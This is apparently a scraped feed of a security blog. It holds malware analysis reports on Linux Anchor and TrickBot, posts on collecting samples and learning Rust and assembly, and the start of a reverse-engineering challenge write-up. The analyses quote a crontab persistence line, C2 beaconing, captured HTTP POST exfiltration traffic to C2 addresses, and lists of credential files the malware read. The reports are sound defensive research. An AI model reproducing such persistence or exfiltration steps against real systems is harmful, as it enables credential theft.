href="https://www.virustotal.com/gui/file/c721189a2b89cd279e9a033c93b8b5017dc165cba89eff5b8e1b5866195518bc/detection">Virustotal</a></li> <li><a href="https://malshare.com/sample.php?action=detail&amp;hash=7d2595904aa6feb46b3e8f3262963042">MalShare</a></li> <li><a href="https://analyze.intezer.com/files/c721189a2b89cd279e9a033c93b8b5017dc165cba89eff5b8e1b5866195518bc">Intezer</a></li> <li><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.anchor_dns">MalPedia</a></li> </ul> <hr /> <h1 id="behavioral-analysis">Behavioral Analysis</h1> <h2 id="processes">Processes</h2> <table> <thead> <tr> <th style="text-align: left">PID</th> <th style="text-align: left">User</th> <th style="text-align: left">Command</th> </tr> </thead> <tbody> <tr> <td style="text-align: left">1654</td> <td style="text-align: left">remnux</td> <td style="text-align: left">sudo ./7d2595904aa6feb46b3e8f3262963042</td> </tr> <tr> <td style="text-align: left">1655</td> <td style="text-align: left">root</td> <td style="text-align: left">./7d2595904aa6feb46b3e8f3262963042</td> </tr> <tr> <td style="text-align: left">1660</td> <td style="text-align: left">root</td> <td style="text-align: left">/bin/sh -c /home/remnux/Downloads/7d2595904aa6feb46b3e8f3262963042</td> </tr> <tr> <td style="text-align: left">1663</td> <td style="text-align: left">root</td> <td style="text-align: left">/home/remnux/Downloads/7d2595904aa6feb46b3e8f3262963042</td> </tr> <tr> <td style="text-align: left">1664</td> <td style="text-align: left">root</td> <td style="text-align: left">/home/remnux/Downloads/7d2595904aa6feb46b3e8f3262963042</td> </tr> <tr> <td style="text-align: left">1667</td> <td style="text-align: left">root</td> <td style="text-align: left">/bin/sh -c /home/remnux/Downloads/7d2595904aa6feb46b3e8f3262963042</td> </tr> <tr> <td style="text-align: left">1668</td> <td style="text-align: left">root</td> <td style="text-align: left">/home/remnux/Downloads/7d2595904aa6feb46b3e8f3262963042</td> </tr> </tbody> </table> <h2 id="modified-files">Modified Files</h2> <p>Process 1655 appended the following to /etc/crontab.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>*/1 ** * *root/home/remnux/Downloads/7d2595904aa6feb46b3e8f3262963042 </code></pre></div></div> <h2 id="pcap">PCAP</h2> <p><a href="https://bizarrechaos.com/attachments/c721189a2b89cd279e9a033c93b8b5017dc165cba89eff5b8e1b5866195518bc.pcap">Download</a></p> <h2 id="protocols">Protocols</h2> <table> <thead> <tr> <th style="text-align: left">Protocol</th> <th style="text-align: left">Number of Packets</th> </tr> </thead> <tbody> <tr> <td style="text-align: left">DNS</td> <td style="text-align: left">222</td> </tr> <tr> <td style="text-align: left">HTTP</td> <td style="text-align: left">2</td> </tr> </tbody> </table> <h2 id="indicators-of-compromise">Indicators of Compromise</h2> <ul> <li>*.biillpi[.]com</li> </ul> <h2 id="external-ip-scraping">External IP Scraping</h2> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GET / HTTP/1.1 Host: checkip.amazonaws.com User-Agent: test my ip Accept: */* HTTP/1.1 200 OK Date: Thu, 06 Aug 2020 02:01:02 GMT Server: lighttpd/1.4.53 Content-Length: 14 Connection: keep-alive 107.158.15.11 </code></pre></div></div> <h2 id="c2-beaconing">C2 Beaconing</h2> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>34 10.874377 192.168.1.101 → 192.168.1.1 DNS 123 Standard query 0x85bf A 898A926AB2D9AFF7CD2FFB3BE8A8A0545BBBBA96.biillpi.com OPT 35 10.874542 192.168.1.101 → 192.168.1.1 DNS 123 Standard query 0xd994 AAAA 898A926AB2D9AFF7CD2FFB3BE8A8A0545BBBBA96.biillpi.com OPT </code></pre></div></div> <h2 id="c2-host-information-exfiltration">C2 Host Information Exfiltration</h2> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>20 9.602723 192.168.1.101 → 192.168.1.1 DNS 314 Standard query 0x1916 A 898A926AB2D9AFF7CD2FFB3BE8A8A0545BB9BA96D8D7DAD1D6CBE6D5D0D7CCC.196CBDCD4D7CCC1E6F58D888C89888888978F8EFBFF8F81FD80FDFD89FF8DFD.8E8B808B898DFF88FB8EFB8D8AF8F8F888FF968996F58D888C8988888896888.989889688898E97888C8197888C97888896FF81.biillpi.com OPT 21 9.610991 192.168.1.101 → 192.168.1.1 DNS 314 Standard query 0x8b73 AAAA 898A926AB2D9AFF7CD2FFB3BE8A8A0545BB9BA96D8D7DAD1D6CBE6D5D0D7CCC.196CBDCD4D7CCC1E6F58D888C89888888978F8EFBFF8F81FD80FDFD89FF8DFD.8E8B808B898DFF88FB8EFB8D8AF8F8F888FF968996F58D888C8988888896888.989889688898E97888C8197888C97888896FF81.biillpi.com OPT </code></pre></div></div> Thu, 06 Aug 2020 01:00:00 +0000 https://bizarrechaos.com/posts/Malware-Analysis-Anchor_Linux/ https://bizarrechaos.com/posts/Malware-Analysis-Anchor_Linux/ malware_analysis posts Malware Analysis: TrickBot <h1 id="disclaimer">Disclaimer</h1> <p>The following is a Malware analysis report for the binary with SHA-256 hash 91beb7c43da3dd723c9d44629ab656b4f913c5ec111d1d362279938645f7edd3.<br /> The binary can be downloaded from <a href="https://bazaar.abuse.ch/sample/91beb7c43da3dd723c9d44629ab656b4f913c5ec111d1d362279938645f7edd3/">MalwareBazaar</a><br /> I take no responsibility for any actions you take based on this report.<br /> Use caution when downloading and executing malware.<br /> Use a virtual machine, be safe, have fun.</p> <h1 id="opinions">Opinions</h1> <p>TrickBots main goal, being a banking trojan at heart, is to steal credit card and banking account information. <br /> However that has not been lucrative enough for the bad actors, hence more and more data is being searched for and the use of stage two payloads has increased.</p> <p>This sample was only running for 15-20 minutes. Typically in TrickBot infections the malware will continue to beacon out indefinitely.<br /> It is not uncommon to see a stage two payload pushed to beaconing victims days after the initial infections.<br /> Typically the stage two payload will be more persistent and usually is either a ransomware variant, or a crypto miner.</p> <p>TrickBot, like other popular trojans, will continue to evolve.<br /> Anti-analysis techniques will be added. Capabilities will be added.<br /> Whether its stealing financial or personal data or delivering ransomware, as long as there is a way to profit from it, it will continue to be used.</p> <h1 id="analysis-summary">Analysis Summary</h1> <p>When executed this malware spawns another instance of itself.<br /> This new process then runs and injects malicious code into the legitimate windows process wermgr.exe.<br /> Wermgr.exe then calls svchost to run the host discovery commands.</p> <p>The discovery seen in this sample involves running ipconfig.exe, net.exe, nltest.exe, as well as a GET request to wtfismyip[.]com which returns the public IP of the host.<br /> Aside from data about the host and network the malware searched for sensitive information on the host as well.<br /> Crypto currency credentials, ssh credentials, vpn credentials and configurations, vnc credentials and configurations, git credentials, as well as browser history, cache and saved passwords were searched for.<br /> The malware then exfiltrates this data over HTTPS in a POST request to several of its C2 servers.<br /> One of the POST requests indicate that credit card information may have also been searched for in the files on the host.</p> <p>As for persistence, nothing of note was done, there were no created registry keys, scheduled tasks, or services.</p> <h1 id="environment-and-tools">Environment and tools</h1> <ul> <li><a href="https://developer.microsoft.com/en-us/windows/downloads/virtual-machines/">Windows 10</a></li> <li><a href="https://github.com/fireeye/flare-vm">Flare VM</a></li> <li><a href="https://www.pfsense.org/">pFsense</a></li> <li><a href="https://www.tcpdump.org/">tcpdump</a></li> <li><a href="https://docs.microsoft.com/en-us/sysinternals/downloads/procmon">procmon</a></li> <li><a href="https://github.com/fireeye/capa">capa</a></li> <li><a href="https://www.winitor.com/">pestudio</a></li> </ul> <hr /> <h1 id="static-analysis">Static Analysis</h1> <table> <thead> <tr> <th style="text-align: left">Data</th> <th style="text-align: left">Value</th> </tr> </thead> <tbody> <tr> <td style="text-align: left">File Size</td> <td style="text-align: left">540724 bytes</td> </tr> <tr> <td style="text-align: left">Code Signing</td> <td style="text-align: left">Unsigned</td> </tr> <tr> <td style="text-align: left">MD5</td> <td style="text-align: left">5930091b65aed9627dd1a4e86458b72f</td> </tr> <tr> <td style="text-align: left">SHA1</td> <td style="text-align: left">1e6ee2e805e21c007aa70217856bf31141ccc552</td> </tr> <tr> <td style="text-align: left">SHA256</td> <td style="text-align: left">91beb7c43da3dd723c9d44629ab656b4f913c5ec111d1d362279938645f7edd3</td> </tr> <tr> <td style="text-align: left">SSDEEP</td> <td style="text-align: left">6144:QXRZwJkHAfrJoz9KnjY/F0eAcLeRpJ0ulEypWu/blRTZSMIbBkfoqpArjO:QXRZmrJoBKIqkapJDmy4uBRTQ4pD</td> </tr> <tr> <td style="text-align: left">IMPHash</td> <td style="text-align: left">a9daf8a064784a80002aa6baaea5ce3b</td> </tr> <tr> <td style="text-align: left">Compile Time</td> <td style="text-align: left">Wed Jul 22 08:55:12 2020</td> </tr> <tr> <td style="text-align: left">Packed</td> <td style="text-align: left">No</td> </tr> <tr> <td style="text-align: left">Compiler</td> <td style="text-align: left">Microsoft Visual Basic 6.0</td> </tr> <tr> <td style="text-align: left">Linker</td> <td style="text-align: left">Microsoft Linker</td> </tr> <tr> <td style="text-align: left">Overlay</td> <td style="text-align: left">PDB 2.0 file link</td> </tr> <tr> <td style="text-align: left">Entropy</td> <td style="text-align: left">6.827</td> </tr> </tbody> </table> <h2 id="pe-sections">PE Sections</h2> <table> <thead> <tr> <th style="text-align: left">PE Section</th> <th style="text-align: left">MD5</th> <th style="text-align: left">Entropy</th> <th style="text-align: left">Size</th> <th style="text-align: left">Entry Point</th> <th style="text-align: left">Access</th> </tr> </thead> <tbody> <tr> <td style="text-align: left">.text</td> <td style="text-align: left">9F4717E23F056519B2BEEB92221702EB</td> <td style="text-align: left">5.838</td> <td style="text-align: left">339968 bytes</td> <td style="text-align: left">0x0000487C</td> <td style="text-align: left">R,X</td> </tr> <tr> <td style="text-align: left">.data</td> <td style="text-align: left">620F0B67A91F7F74151BC5BE745B7110</td> <td style="text-align: left">0</td> <td style="text-align: left">4096 bytes</td> <td style="text-align: left"> </td> <td style="text-align: left">R,W,ID</td> </tr> <tr> <td style="text-align: left">.rsrc</td> <td style="text-align: left">34DEF4049197F06B4075C6A749B19987</td> <td style="text-align: left">7.895</td> <td style="text-align: left">192512 bytes</td> <td style="text-align: left"> </td> <td style="text-align: left">R,ID</td> </tr> </tbody> </table> <h2 id="imports">Imports</h2> <table> <thead> <tr> <th style="text-align: left">Library</th> <th style="text-align: left">Count</th> </tr> </thead> <tbody> <tr> <td style="text-align: left">oleaut32.dll</td> <td style="text-align: left">1</td> </tr> <tr> <td style="text-align: left">kernel32.dll</td> <td style="text-align: left">1</td> </tr> <tr> <td style="text-align: left">MSVBVM60.DLL</td> <td style="text-align: left">144</td> </tr> </tbody> </table> <h3 id="possible-breakpoints">Possible Breakpoints</h3> <ul> <li>VirtualAlloc</li> </ul> <h2 id="capabilities">Capabilities</h2> <table> <thead> <tr> <th style="text-align: left">Capability</th> <th style="text-align: left">Namespace</th> </tr> </thead> <tbody> <tr> <td style="text-align: left">execute anti-VM instructions (2 matches)</td> <td style="text-align: left">anti-analysis/anti-vm/vm-detection</td> </tr> <tr> <td style="text-align: left">contains PDB path</td> <td style="text-align: left">executable/pe/pdb</td> </tr> <tr> <td style="text-align: left">contain a resource (.rsrc) section</td> <td style="text-align: left">executable/pe/section/rsrc</td> </tr> <tr> <td style="text-align: left">parse PE header (4 matches)</td> <td style="text-align: left">load-code/pe</td> </tr> </tbody> </table> <h2 id="tactics-and-techniques">Tactics and Techniques</h2> <table> <thead> <tr> <th style="text-align: left">ATT&amp;CK Tactic</th> <th style="text-align: left">ATT&amp;CK Technique</th> </tr> </thead> <tbody> <tr> <td style="text-align: left">DEFENSE EVASION</td> <td style="text-align: left">Virtualization/Sandbox Evasion::System Checks [T1497.001]</td> </tr> <tr> <td style="text-align: left">EXECUTION</td> <td style="text-align: left">Shared Modules [T1129]</td> </tr> </tbody> </table> <h2 id="osint">OSINT</h2> <ul> <li><a href="https://www.virustotal.com/gui/file/91beb7c43da3dd723c9d44629ab656b4f913c5ec111d1d362279938645f7edd3/detection">Virustotal</a></li> <li><a href="https://bazaar.abuse.ch/sample/91beb7c43da3dd723c9d44629ab656b4f913c5ec111d1d362279938645f7edd3/">MalwareBazaar</a></li> <li><a href="https://www.capesandbox.com/analysis/31332/">CAPE</a></li> <li><a href="https://tria.ge/reports/200722-9yv23veh5n/behavioral1">Triage</a></li> <li><a href="https://www.joesandbox.com/analysis/395432">JoeSandbox</a></li> <li><a href="https://analyze.intezer.com/analyses/7caca120-4d8f-4c88-b7c9-c01da86f725c">Intezer</a></li> <li><a href="https://www.hybrid-analysis.com/sample/91beb7c43da3dd723c9d44629ab656b4f913c5ec111d1d362279938645f7edd3">HybridAnalysis</a></li> <li><a href="https://www.packettotal.com/app/queue?id=a401728099e41beca3d38a82c2ecd82f">PacketTotal</a></li> <li><a href="https://pcap.honeynet.org.my/v1/submission/view.php?id=12957.php">HoneyNet</a></li> </ul> <hr /> <h1 id="behavioral-analysis">Behavioral Analysis</h1> <h2 id="processes">Processes</h2> <table> <thead> <tr> <th style="text-align: left">Process</th> <th style="text-align: left">PID</th> <th style="text-align: left">Command Line</th> </tr> </thead> <tbody> <tr> <td style="text-align: left">91beb7c43da3dd….exe</td> <td style="text-align: left">5388</td> <td style="text-align: left">91beb7c43da3dd….exe</td> </tr> <tr> <td style="text-align: left">91beb7c43da3dd….exe</td> <td style="text-align: left">3128</td> <td style="text-align: left">91beb7c43da3dd….exe</td> </tr> <tr> <td style="text-align: left">wermgr.exe</td> <td style="text-align: left">2904</td> <td style="text-align: left">wermgr.exe</td> </tr> <tr> <td style="text-align: left">svchost.exe</td> <td style="text-align: left">5204</td> <td style="text-align: left">svchost.exe</td> </tr> <tr> <td style="text-align: left">svchost.exe</td> <td style="text-align: left">6944</td> <td style="text-align: left">svchost.exe</td> </tr> <tr> <td style="text-align: left">ipconfig.exe</td> <td style="text-align: left">6016</td> <td style="text-align: left">ipconfig /all</td> </tr> <tr> <td style="text-align: left">net.exe</td> <td style="text-align: left">6240</td> <td style="text-align: left">net config workstation</td> </tr> <tr> <td style="text-align: left">net.exe</td> <td style="text-align: left">6404</td> <td style="text-align: left">net view /all</td> </tr> <tr> <td style="text-align: left">net.exe</td> <td style="text-align: left">264</td> <td style="text-align: left">net view /all /domain</td> </tr> <tr> <td style="text-align: left">nltest.exe</td> <td style="text-align: left">6556</td> <td style="text-align: left">nltest /domain_trusts</td> </tr> <tr> <td style="text-align: left">nltest.exe</td> <td style="text-align: left">3808</td> <td style="text-align: left">nltest /domain_trusts /all_trusts</td> </tr> </tbody> </table> <h2 id="files-created">Files Created</h2> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:\Users\REM\AppData\Local\Temp\~DF5E8D1E64DE577706.TMP </code></pre></div></div> <h2 id="files-accessed">Files Accessed</h2> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:\Program Files\UltraVNC\ultravnc.ini C:\Program Files\uvnc bvba\UltraVNC\ultravnc.ini C:\Program Files (x86)\UltraVNC\ultravnc.ini C:\Program Files (x86)\uvnc bvba\UltraVNC\ultravnc.ini C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\History C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\History.bak C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Login Data C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Web Data C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak C:\Users\REM\AppData\Local\Google\Chrome\User Data\Local State C:\Users\REM\AppData\Local\Google\Chrome\User Data\Local State.bak C:\Users\REM\.config\git\credentials C:\Users\REM\.git-credentials </code></pre></div></div> <h2 id="directories-listed">Directories Listed</h2> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:\Users\REM\AppData\Roaming\bitcoin C:\Users\REM\AppData\Roaming\litecoin C:\Users\REM\.ssh C:\Users\REM\AppData\Local\Microsoft\Windows\INetCookies C:\Users\REM\AppData\Local\Microsoft\Windows\INetCache C:\Users\REM\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Users\REM\AppData\Local\Microsoft\Windows\INetCache\IE </code></pre></div></div> <h2 id="pcap">PCAP</h2> <p><a href="https://bizarrechaos.com/attachments/91beb7c43da3dd723c9d44629ab656b4f913c5ec111d1d362279938645f7edd3.pcap">Download</a></p> <h2 id="protocols">Protocols</h2> <table> <thead> <tr> <th style="text-align: left">Protocol</th> <th style="text-align: left">Number of Packets</th> </tr> </thead> <tbody> <tr> <td style="text-align: left">TCP</td> <td style="text-align: left">1218</td> </tr> <tr> <td style="text-align: left">SSL</td> <td style="text-align: left">623</td> </tr> <tr> <td style="text-align: left">HTTP</td> <td style="text-align: left">10</td> </tr> </tbody> </table> <h2 id="indicators-of-compromise">Indicators of Compromise</h2> <ul> <li>103.12.161.194</li> <li>103.111.83.246</li> <li>103.12.161.194</li> <li>82.146.46.209</li> <li>194.5.249.157</li> <li>96.9.73.73</li> <li>203.176.135.102</li> </ul> <h2 id="exfiltration">Exfiltration</h2> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/81/ HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=---------KNFVSHSAHHJUPYKX User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 194.5.249.157:443 Content-Length: 219 Connection: Close Cache-Control: no-cache -----------KNFVSHSAHHJUPYKX Content-Disposition: form-data; name="data" -----------KNFVSHSAHHJUPYKX Content-Disposition: form-data; name="source" OpenVPN passwords and configs -----------KNFVSHSAHHJUPYKX-- </code></pre></div></div> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/83/ HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=---------OCPLLBXQPEACMBMT User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 194.5.249.157:443 Content-Length: 473 Connection: Close Cache-Control: no-cache -----------OCPLLBXQPEACMBMT Content-Disposition: form-data; name="formdata" {"descr":["NordVPN"],"dns1":["103.86.99.100"],"email":["USERNAME"],"q":["microsoft office"],"search":["91beb7c43da3dd723c9d44629ab656b4f913c5ec111d1d362279938645f7edd3"],"usernamefld":["admin"]}-----------OCPLLBXQPEACMBMT Content-Disposition: form-data; name="billinfo" {]}-----------OCPLLBXQPEACMBMT Content-Disposition: form-data; name="cardinfo" {]} -----------OCPLLBXQPEACMBMT-- </code></pre></div></div> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/81/ HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=---------IMJCMDOMDOMKUGNM User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 96.9.73.73 Content-Length: 219 Connection: Close Cache-Control: no-cache -----------IMJCMDOMDOMKUGNM Content-Disposition: form-data; name="data" -----------IMJCMDOMDOMKUGNM Content-Disposition: form-data; name="source" OpenVPN passwords and configs -----------IMJCMDOMDOMKUGNM-- </code></pre></div></div> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/81/ HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=---------OTTNHTNLBMUSVCXD User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 194.5.249.157:443 Content-Length: 210 Connection: Close Cache-Control: no-cache -----------OTTNHTNLBMUSVCXD Content-Disposition: form-data; name="data" -----------OTTNHTNLBMUSVCXD Content-Disposition: form-data; name="source" OpenSSH private keys -----------OTTNHTNLBMUSVCXD-- </code></pre></div></div> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/83/ HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=---------QAKGETNFFXRQJOMX User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 96.9.73.73 Content-Length: 473 Connection: Close Cache-Control: no-cache -----------QAKGETNFFXRQJOMX Content-Disposition: form-data; name="formdata" {"descr":["NordVPN"],"dns1":["103.86.99.100"],"email":["USERNAME"],"q":["microsoft office"],"search":["91beb7c43da3dd723c9d44629ab656b4f913c5ec111d1d362279938645f7edd3"],"usernamefld":["admin"]}-----------QAKGETNFFXRQJOMX Content-Disposition: form-data; name="billinfo" {]}-----------QAKGETNFFXRQJOMX Content-Disposition: form-data; name="cardinfo" {]} -----------QAKGETNFFXRQJOMX-- </code></pre></div></div> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/81/ HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=---------BSBWMEZDSAFVUJLA User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 96.9.73.73 Content-Length: 210 Connection: Close Cache-Control: no-cache -----------BSBWMEZDSAFVUJLA Content-Disposition: form-data; name="data" -----------BSBWMEZDSAFVUJLA Content-Disposition: form-data; name="source" OpenSSH private keys -----------BSBWMEZDSAFVUJLA-- </code></pre></div></div> Thu, 30 Jul 2020 22:30:00 +0000 https://bizarrechaos.com/posts/Malware-Analysis-TrickBot/ https://bizarrechaos.com/posts/Malware-Analysis-TrickBot/ malware_analysis posts Obtaining malware <p>In preparation to step my reversing game up I have decided to setup some infrastructure and tools to make it easier to jump straight into malware.</p> <p>I have a dedicated lab system and in Virtualbox I have pfSense VM that automatically connects to a VPN provider and supplies a network for the following VMs: Windows, <a href="https://remnux.org/">Remnux</a>, and <a href="https://securityonion.net/">Security Onion</a></p> <p>Both REMnux and Security Onion just released major updates, definitely check them out.</p> <p>Having the sysytems ready, snapshots taken, I just need a way to obtain malware. Previously I would use <a href="https://malshare.com/">Malshare</a></p> <p>Don’t get me wrong, malshare is great, however the submissions arent necessarily “Malicious”. Recently the folks over at Abuse.ch came out with <a href="https://bazaar.abuse.ch/">MalwareBazaar</a></p> <p>What sets MalwareBazaar apart from Malshare is that MalwareBazaar does not accept Adware or PUP/PUA uploads, and typically only accepts new samples.</p> <p>Being me I can’t just be satisfied with a great website, luckily MalwareBazaar has a great API I can take advantage of. Ive created a quick little cli tool in python to help me grab some of that sweet sweet malware.</p> <p><a href="https://github.com/bizarrechaos/malwarebazaar-cli">malwarebazaar-cli</a></p> <script id="asciicast-wX83L7p1l75TkZcYxqvtcBSc6" src="https://asciinema.org/a/wX83L7p1l75TkZcYxqvtcBSc6.js" async=""></script> <p>Now that you’ve obtained your malware what do you do with it. Do you have a special harddrive to store it on? Do you only keep it until you have analysed it? Personally I’m a bit of a horder, so I like to store mine in <a href="https://github.com/countercept/snake">snake</a></p> <p>Snake allows me to store malware as well as my analysis notes and it will even perform basic static analysis on the files with plugins called scales.</p> <p>I will try to post some analysis blogs in the future showcasing the usage of these tools.</p> Thu, 23 Jul 2020 00:16:00 +0000 https://bizarrechaos.com/posts/Obtaining-malware/ https://bizarrechaos.com/posts/Obtaining-malware/ python tools cli re posts Adventures in rust <p>It has been awhile since my last post. I need to jump back into the RE excercises and get some of that documented, however lately I have been diving into rust.</p> <p>Most of my programming/coding previously has been in python. Don’t get wrong, I love and still use and write python daily, however I wanted something different.</p> <p>Recently I’ve been playing with rust. Rust is a compiled language that is built for security and speed. While none of the concepts I know and love really translate to rust I thought it was something I wanted to take on. I have been following the official <a href="https://doc.rust-lang.org/stable/book/">The Rust Programming Language Book</a></p> <p>So far it has been a great expierence and I look forward to developing some new tools. My first project is something I have wanted for awhile (and there are likely alternative already out there). I wrote a script in python a few years ago to take a filepath and print multiple hashes for that file. It worked without issue, the problem was the speed at which it ran. This wasn’t an issue unless you wanted to has several files all at once, a common task for the budding malware analyst. So doing some research I looked into rust and discovered I could do what I wanted in rust, and I could do it fast.</p> <p>Introducing <a href="https://github.com/bizarrechaos/hashy">hashy</a></p> <script id="asciicast-Ov8vSYAtuvBdJGvmE1lnmBMWd" src="https://asciinema.org/a/Ov8vSYAtuvBdJGvmE1lnmBMWd.js" async=""></script> <p>Feel free to check it out and contribute if you feel inclined. I have absolutely no idea what I am doing in rust so I expect this can be made exceptionally better.</p> Wed, 17 Jun 2020 19:54:00 +0000 https://bizarrechaos.com/posts/Adventures-in-rust/ https://bizarrechaos.com/posts/Adventures-in-rust/ cli tools rust posts Adventures in Assembly <p>For the past month I have been on a journey, an adventure even, to learn assembly code (x86 specifically). The end result is to be able to read assembly code and move into more in depth malware analysis.</p> <p>I found an online course that I think is great so far: <a href="https://www.udemy.com/x86-asm-foundations/?couponCode=xorpd_website_20">‘xorpd - Assembly Language Adventures: Complete’</a></p> <p>The author and instructor xorpd has a great site as well: <a href="https://www.xorpd.net/">‘xorpd.net’</a></p> <p>On his site you can find some great references for Assembly Language. The course will take you from 0 knowledge about computers to a very good foundation in x86 Assembly. He does stick with Windows and FASM in his course, but most of the excercises have been translated to YASM and will run on linux.</p> <p>I also came across a neat little go program that helps to emulate x86 or x64 systems and gives you visual representation of the registers and stack as you enter instructions. It is kind of like an assembly language interpreter or cli. <a href="https://github.com/cch123/asm-cli">‘asm-cli’</a></p> <p>Here is an example of it in action:</p> <script id="asciicast-sIksRB2w7zWKa17ruIkqVjOyI" src="https://asciinema.org/a/sIksRB2w7zWKa17ruIkqVjOyI.js" async=""></script> <p>Pretty useful if you want to determine the value a register has after a few instructions.</p> <p>So far everything I have disassembled has been pretty basic code.</p> <p>With the resources above, and through continued learning, I hope to be able to dive into more complex code.</p> <p>I will be blogging about some more challenges soon hopefully.</p> <p>I may make a post or two about xorpd’s “xchg rax,rax” musings you can find on his website.</p> Sat, 06 Jul 2019 22:00:00 +0000 https://bizarrechaos.com/posts/Adventures-in-Assembly/ https://bizarrechaos.com/posts/Adventures-in-Assembly/ re asm posts MalwareTech Challenge - shellcode2.exe <p>I have been teaching myself to reverse engineer binary programs so that I can use these skills to reverse engineer malware. I have been learning assembly code, and playing with new tools such as ghidra and radare2/cutter.</p> <p>I found that <a href="https://twitter.com/MalwareTechBlog">@MalwareTech</a> had some great binary analysis challenges on his blog and decided to check them out.</p> <p>This write up covers the fifth challenge shellcode2.exe: <a href="https://www.malwaretech.com/challenges-shellcode2">‘https://www.malwaretech.com/challenges-shellcode2’</a></p> <p>Lets open this binary in cutter and analyze it with radare2. Lets take a look at the entry function:</p> <pre><code class="language-assembly">/ (fcn) entry0 342 | entry0 (); | ; var LPVOID s1 @ ebp-0xc0 | ; var LPCSTR lpText @ ebp-0xbc | ; var int32_t var_b8h @ ebp-0xb8 | ; var int32_t var_28h @ ebp-0x28 | ; var int32_t var_27h @ ebp-0x27 | ; var int32_t var_26h @ ebp-0x26 | ; var int32_t var_25h @ ebp-0x25 | ; var int32_t var_24h @ ebp-0x24 | ; var int32_t var_23h @ ebp-0x23 | ; var int32_t var_22h @ ebp-0x22 | ; var int32_t var_21h @ ebp-0x21 | ; var int32_t var_20h @ ebp-0x20 | ; var int32_t var_1fh @ ebp-0x1f | ; var int32_t var_1eh @ ebp-0x1e | ; var int32_t var_1dh @ ebp-0x1d | ; var int32_t var_1ch @ ebp-0x1c | ; var int32_t var_1bh @ ebp-0x1b | ; var int32_t var_1ah @ ebp-0x1a | ; var int32_t var_19h @ ebp-0x19 | ; var int32_t var_18h @ ebp-0x18 | ; var int32_t var_17h @ ebp-0x17 | ; var int32_t var_16h @ ebp-0x16 | ; var int32_t var_15h @ ebp-0x15 | ; var int32_t var_14h @ ebp-0x14 | ; var int32_t var_13h @ ebp-0x13 | ; var int32_t var_12h @ ebp-0x12 | ; var int32_t var_11h @ ebp-0x11 | ; var int32_t var_10h @ ebp-0x10 | ; var int32_t var_fh @ ebp-0xf | ; var int32_t var_eh @ ebp-0xe | ; var int32_t var_dh @ ebp-0xd | ; var int32_t var_ch @ ebp-0xc | ; var int32_t var_bh @ ebp-0xb | ; var int32_t var_ah @ ebp-0xa | ; var int32_t var_9h @ ebp-0x9 | ; var int32_t var_8h @ ebp-0x8 | ; var int32_t var_7h @ ebp-0x7 | ; var int32_t var_6h @ ebp-0x6 | ; var int32_t var_5h @ ebp-0x5 | ; var LPVOID var_4h @ ebp-0x4 | 0x00402270 push ebp | 0x00402271 mov ebp, esp | 0x00402273 sub esp, 0xc0 | 0x00402279 lea ecx, [var_b8h] | 0x0040227f call 